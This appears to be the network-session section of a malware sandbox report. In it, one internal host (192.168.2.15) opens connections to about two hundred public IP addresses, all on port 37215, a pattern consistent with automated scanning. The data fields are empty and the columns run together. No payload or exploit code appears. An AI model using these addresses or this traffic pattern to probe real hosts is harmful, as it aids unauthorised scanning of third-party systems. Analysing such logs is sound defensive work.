                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9300192.168.2.1555446222.205.231.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9301192.168.2.153698441.254.14.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9302192.168.2.1557300180.148.213.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9303192.168.2.153520841.16.24.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9304192.168.2.153702641.203.206.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9305192.168.2.155308641.209.201.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9306192.168.2.1536850157.146.105.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9307192.168.2.1532932197.239.49.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9308192.168.2.154196412.157.181.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9309192.168.2.1547626222.29.125.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9310192.168.2.154131441.47.47.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9311192.168.2.1539010197.57.28.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9312192.168.2.1540492157.82.191.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9313192.168.2.1540338197.62.25.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9314192.168.2.1549876197.112.192.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9315192.168.2.1532772157.185.96.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9316192.168.2.1535852112.18.204.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9317192.168.2.1546648197.128.60.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9318192.168.2.153363639.171.81.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9319192.168.2.1549316197.213.178.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9320192.168.2.155627041.187.152.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9321192.168.2.156047457.42.126.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9322192.168.2.155159241.117.54.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9323192.168.2.1551708197.47.97.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9324192.168.2.153339891.235.222.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9325192.168.2.1552708157.31.236.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9326192.168.2.1559576197.113.95.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9327192.168.2.153576241.68.164.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9328192.168.2.154630041.123.203.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9329192.168.2.155000841.248.48.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9330192.168.2.1537680197.155.10.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9331192.168.2.1552402197.110.27.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9332192.168.2.1560824115.219.109.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9333192.168.2.154575241.169.39.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9334192.168.2.154873618.166.208.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9335192.168.2.156060041.102.122.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9336192.168.2.1554110157.32.159.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9337192.168.2.1539208197.187.98.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9338192.168.2.1555926197.141.251.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9339192.168.2.154255441.76.203.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9340192.168.2.1537236197.174.175.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9341192.168.2.1552734157.135.210.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9342192.168.2.1535924197.178.149.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9343192.168.2.155654841.38.238.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9344192.168.2.155068831.137.185.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9345192.168.2.1538520197.127.75.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9346192.168.2.1555238157.0.123.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9347192.168.2.1548266157.193.30.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9348192.168.2.1555324223.199.46.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9349192.168.2.155932241.58.240.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9350192.168.2.1534604197.242.86.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9351192.168.2.1559468197.146.201.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9352192.168.2.153415241.155.252.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9353192.168.2.1550476197.141.229.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9354192.168.2.154039041.155.102.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9355192.168.2.1533446197.129.24.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9356192.168.2.1544774157.64.100.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9357192.168.2.153898614.67.110.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9358192.168.2.1549086197.106.118.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9359192.168.2.1559576190.185.180.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9360192.168.2.1545046157.110.104.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9361192.168.2.1534856157.120.1.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9362192.168.2.1539148197.194.143.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9363192.168.2.1541318157.22.138.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9364192.168.2.1551958197.168.71.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9365192.168.2.1535720197.22.168.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9366192.168.2.1552518197.99.23.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9367192.168.2.1542798157.173.228.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9368192.168.2.1551592157.247.146.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9369192.168.2.154502841.213.145.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9370192.168.2.1536194197.115.100.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9371192.168.2.1537404157.147.57.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9372192.168.2.155344661.232.205.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9373192.168.2.1535388162.61.57.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9374192.168.2.154324241.104.64.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9375192.168.2.1546370197.124.198.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9376192.168.2.1545428157.65.70.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9377192.168.2.1542180197.74.90.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9378192.168.2.1547134197.9.181.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9379192.168.2.1558646135.170.243.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9380192.168.2.1548594152.106.48.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9381192.168.2.1538052157.215.229.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9382192.168.2.1535204157.92.102.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9383192.168.2.154582089.156.85.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9384192.168.2.1556556210.86.91.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9385192.168.2.155029498.170.157.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9386192.168.2.155526641.55.240.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9387192.168.2.1546046197.14.248.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9388192.168.2.1555758157.204.15.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9389192.168.2.1557424197.15.164.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9390192.168.2.154728441.217.90.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9391192.168.2.155999841.108.33.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9392192.168.2.154505241.51.185.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9393192.168.2.155069841.63.207.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9394192.168.2.1551902197.83.61.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9395192.168.2.1548012157.97.231.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9396192.168.2.156064441.219.43.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9397192.168.2.155169241.56.158.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9398192.168.2.155397641.222.154.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9399192.168.2.1539956197.83.130.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9400192.168.2.1560928157.150.109.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9401192.168.2.1552804197.253.47.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9402192.168.2.1552556157.140.163.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9403192.168.2.1540794157.182.77.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9404192.168.2.155085827.131.3.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9405192.168.2.155724241.118.245.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9406192.168.2.153837641.98.55.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9407192.168.2.1542346197.84.174.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9408192.168.2.1545194157.200.58.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9409192.168.2.1556952148.193.112.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9410192.168.2.1552128197.17.184.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9411192.168.2.154785841.51.147.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9412192.168.2.155666641.187.77.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9413192.168.2.154573041.248.176.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9414192.168.2.1547370157.177.27.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9415192.168.2.1560944157.5.189.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9416192.168.2.154010241.115.210.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9417192.168.2.153335641.151.251.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9418192.168.2.1539176157.98.220.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9419192.168.2.154760441.219.64.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9420192.168.2.1542510197.121.230.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9421192.168.2.155532234.106.164.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9422192.168.2.155944061.21.162.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9423192.168.2.153348641.180.134.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9424192.168.2.1556968186.71.190.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9425192.168.2.155369041.85.59.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9426192.168.2.1558742194.197.125.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9427192.168.2.1538760157.231.177.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9428192.168.2.155367241.123.42.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9429192.168.2.155913441.132.225.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9430192.168.2.1558462157.143.100.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9431192.168.2.1547310197.201.23.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9432192.168.2.153602844.28.242.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9433192.168.2.1537800157.140.34.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9434192.168.2.1544294197.22.205.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9435192.168.2.15591784.164.6.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9436192.168.2.1558356185.193.203.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9437192.168.2.1543066157.37.85.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9438192.168.2.155741041.104.218.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9439192.168.2.153736841.234.231.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9440192.168.2.1537672157.63.147.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9441192.168.2.1542314197.56.136.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9442192.168.2.1538442157.11.39.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9443192.168.2.154649441.176.55.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9444192.168.2.1540640157.79.86.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9445192.168.2.1548792147.129.187.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9446192.168.2.1541454129.56.228.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9447192.168.2.155922841.100.21.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9448192.168.2.154813041.239.140.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9449192.168.2.1536708168.113.122.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9450192.168.2.154456041.73.105.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9451192.168.2.1551002197.218.229.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9452192.168.2.154362841.236.77.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9453192.168.2.1547100197.41.217.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9454192.168.2.155320254.178.237.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9455192.168.2.153819841.127.213.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9456192.168.2.1533316157.185.33.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9457192.168.2.1537218103.170.98.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9458192.168.2.1541924157.32.224.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9459192.168.2.1541482157.235.38.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9460192.168.2.1554504157.126.118.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9461192.168.2.1540228157.184.185.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9462192.168.2.1547740157.179.35.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9463192.168.2.1542560197.147.4.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9464192.168.2.1548796197.221.226.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9465192.168.2.155707438.65.181.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9466192.168.2.154502841.207.177.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9467192.168.2.155548441.81.85.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9468192.168.2.1541552197.159.152.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9469192.168.2.1541896197.175.241.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9470192.168.2.1544262197.76.135.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9471192.168.2.1545568197.225.234.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9472192.168.2.154104241.79.50.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9473192.168.2.155779041.165.200.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9474192.168.2.1541090157.157.241.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9475192.168.2.154870241.133.101.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9476192.168.2.1559148157.220.64.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9477192.168.2.1541456157.125.88.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9478192.168.2.154284441.137.129.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9479192.168.2.154279641.68.243.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9480192.168.2.1547340157.116.168.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9481192.168.2.153573025.46.179.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9482192.168.2.1540650197.48.187.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9483192.168.2.1551910121.100.169.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9484192.168.2.1539918197.89.29.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9485192.168.2.1546608101.211.222.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9486192.168.2.1549698157.56.159.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9487192.168.2.155846041.143.132.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9488192.168.2.153378041.73.225.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9489192.168.2.154355262.104.207.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9490192.168.2.1550686121.234.195.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9491192.168.2.1538126173.220.232.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9492192.168.2.154315841.28.83.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9493192.168.2.1541158157.14.145.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9494192.168.2.154637041.186.199.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9495192.168.2.1534946157.147.242.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9496192.168.2.155742441.175.153.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9497192.168.2.1536338157.148.215.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9498192.168.2.155606283.80.115.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9499192.168.2.1540480197.167.37.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9500192.168.2.154463441.159.141.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9501192.168.2.1533426100.60.151.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9502192.168.2.153742241.97.95.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9503192.168.2.1537092197.125.15.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9504192.168.2.1554832116.157.223.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9505192.168.2.155540831.173.140.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9506192.168.2.1556286197.197.35.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9507192.168.2.1539506157.109.39.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9508192.168.2.155190241.19.137.1737215
                                                          TimestampBytes transferredDirectionData


